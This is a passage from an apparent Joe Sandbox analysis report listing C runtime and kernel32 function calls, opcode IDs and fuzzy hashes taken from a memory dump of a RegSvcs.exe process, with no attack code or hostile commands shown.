                                                                • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                APIs
                                                                • __getptd.LIBCMT ref: 00414744
                                                                  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                • __getptd.LIBCMT ref: 0041475B
                                                                • __amsg_exit.LIBCMT ref: 00414769
                                                                • __lock.LIBCMT ref: 00414779
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                • String ID: @.B
                                                                • API String ID: 3521780317-470711618
                                                                • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                APIs
                                                                • __lock_file.LIBCMT ref: 0040C6C8
                                                                • __fileno.LIBCMT ref: 0040C6D6
                                                                • __fileno.LIBCMT ref: 0040C6E2
                                                                • __fileno.LIBCMT ref: 0040C6EE
                                                                • __fileno.LIBCMT ref: 0040C6FE
                                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                • String ID:
                                                                • API String ID: 2805327698-0
                                                                • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                APIs
                                                                • __getptd.LIBCMT ref: 00413FD8
                                                                  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                • __amsg_exit.LIBCMT ref: 00413FF8
                                                                • __lock.LIBCMT ref: 00414008
                                                                • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                • InterlockedIncrement.KERNEL32(02651660), ref: 00414050
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                • String ID:
                                                                • API String ID: 4271482742-0
                                                                • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                • API String ID: 1646373207-3105848591
                                                                • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                APIs
                                                                • __fileno.LIBCMT ref: 0040C77C
                                                                • __locking.LIBCMT ref: 0040C791
                                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                • String ID:
                                                                • API String ID: 2395185920-0
                                                                • Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                • Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _fseek_malloc_memset
                                                                • String ID:
                                                                • API String ID: 208892515-0
                                                                • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                • __isleadbyte_l.LIBCMT ref: 00415307
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                • String ID:
                                                                • API String ID: 3058430110-0
                                                                • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89